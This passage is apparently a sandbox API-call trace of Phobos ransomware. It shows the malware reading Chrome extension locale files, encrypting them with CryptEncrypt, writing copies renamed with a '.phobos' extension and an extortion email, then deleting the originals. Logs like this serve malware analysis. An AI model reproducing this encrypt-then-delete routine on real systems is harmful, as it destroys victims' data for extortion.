pdwDataLen=0x2f4fc48*=0x2a0, dwBufLen=0x2a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2a0) returned 1 [0158.481] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2a0, lpOverlapped=0x0) returned 1 [0158.613] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0158.613] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0158.613] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0158.613] CryptDestroyKey (hKey=0xa32c68) returned 1 [0158.613] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0158.613] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0158.613] CloseHandle (hObject=0x130) returned 1 [0158.613] CloseHandle (hObject=0x134) returned 1 [0158.613] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json")) returned 1 [0158.631] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0158.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0158.631] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=783) returned 1 [0158.631] CloseHandle (hObject=0x134) returned 1 [0158.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json")) returned 0x2020 [0158.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0158.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0158.632] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0158.632] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0158.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0158.632] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0158.633] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0158.633] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x30f, lpOverlapped=0x0) returned 1 [0158.662] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x310, dwBufLen=0x310 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x310) returned 1 [0158.662] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x310, lpOverlapped=0x0) returned 1 [0159.201] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0159.201] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.201] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0159.201] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.201] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0159.201] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0159.201] CloseHandle (hObject=0x134) returned 1 [0159.201] CloseHandle (hObject=0x130) returned 1 [0159.201] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json")) returned 1 [0159.202] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0159.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0159.202] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=642) returned 1 [0159.202] CloseHandle (hObject=0x130) returned 1 [0159.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json")) returned 0x2020 [0159.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0159.202] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.203] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0159.203] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0159.203] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.203] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x282, lpOverlapped=0x0) returned 1 [0159.210] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290, dwBufLen=0x290 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290) returned 1 [0159.210] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x290, lpOverlapped=0x0) returned 1 [0159.211] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0159.211] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.211] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0159.211] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.211] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0159.211] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0159.211] CloseHandle (hObject=0x130) returned 1 [0159.211] CloseHandle (hObject=0x134) returned 1 [0159.211] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json")) returned 1 [0159.212] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0159.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0159.212] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=649) returned 1 [0159.212] CloseHandle (hObject=0x134) returned 1 [0159.212] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json")) returned 0x2020 [0159.212] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0159.213] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.213] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0159.213] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0159.213] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.213] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x289, lpOverlapped=0x0) returned 1 [0159.219] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290, dwBufLen=0x290 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290) returned 1 [0159.219] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x290, lpOverlapped=0x0) returned 1 [0159.220] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0159.220] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.220] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0159.220] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.220] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0159.220] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0159.221] CloseHandle (hObject=0x134) returned 1 [0159.221] CloseHandle (hObject=0x130) returned 1 [0159.221] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json")) returned 1 [0159.222] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0159.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0159.223] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=650) returned 1 [0159.223] CloseHandle (hObject=0x130) returned 1 [0159.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json")) returned 0x2020 [0159.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0159.223] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.223] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0159.224] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0159.224] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.224] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x28a, lpOverlapped=0x0) returned 1 [0159.230] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290, dwBufLen=0x290 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290) returned 1 [0159.230] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x290, lpOverlapped=0x0) returned 1 [0159.231] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0159.231] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.231] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0159.231] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.231] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0159.231] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0159.231] CloseHandle (hObject=0x130) returned 1 [0159.231] CloseHandle (hObject=0x134) returned 1 [0159.231] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 